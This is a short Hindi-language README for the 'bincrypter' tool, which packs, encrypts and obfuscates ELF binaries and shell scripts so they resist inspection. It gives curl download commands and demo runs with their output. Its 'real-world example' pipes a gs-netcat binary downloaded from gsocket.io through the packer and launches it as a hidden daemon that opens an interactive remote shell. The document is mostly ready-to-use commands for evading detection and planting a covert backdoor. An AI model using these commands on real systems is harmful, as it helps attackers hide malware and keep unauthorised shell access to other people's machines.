
ELF + SHELL स्क्रिप्ट को पैक/एन्क्रिप्ट/अस्पष्ट करें
string केवल कबाड़ दिखाता है)/bin/sh + perl + openssl की आवश्यकता होती है
डाउनलोड करें:
curl -SsfL https://github.com/hackerschoice/bincrypter/releases/latest/download/bincrypter -o bincrypter
chmod +x bincrypter
./bincrypter -h
उदाहरण:
cp /usr/bin/id id
./bincrypter id
# Compressed: 68552 --> 24176 [35%]
./id
# uid=0(root) gid=0(root) groups=0(root)
कस्टम PASSWORD सेट करें (वैकल्पिक रूप से):
cp /usr/bin/id id
./bincrypter id foobar
# Compressed: 68552 --> 23860 [34%]
./id
# Enter Password: foobar
# uid=0(root) gid=0(root) groups=0(root)
वास्तविक दुनिया का उदाहरण:
curl -SsfL "https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)" | PASSWORD="foobar" ./bincrypter >gsnc
chmod +x gsnc
PASSWORD="foobar" GS_ARGS="-ilD -s ChangeMe" ./gsnc
अन्य बेहतरीन कार्य:
https://github.com/guitmz/ezuri
https://github.com/upx/upx
https://bitlackeys.org/#sherlocked
मज़े में शामिल हों: https://thc.org/ops
bsky: @hackerschoice.bsky.social
Mastodon: @[email protected]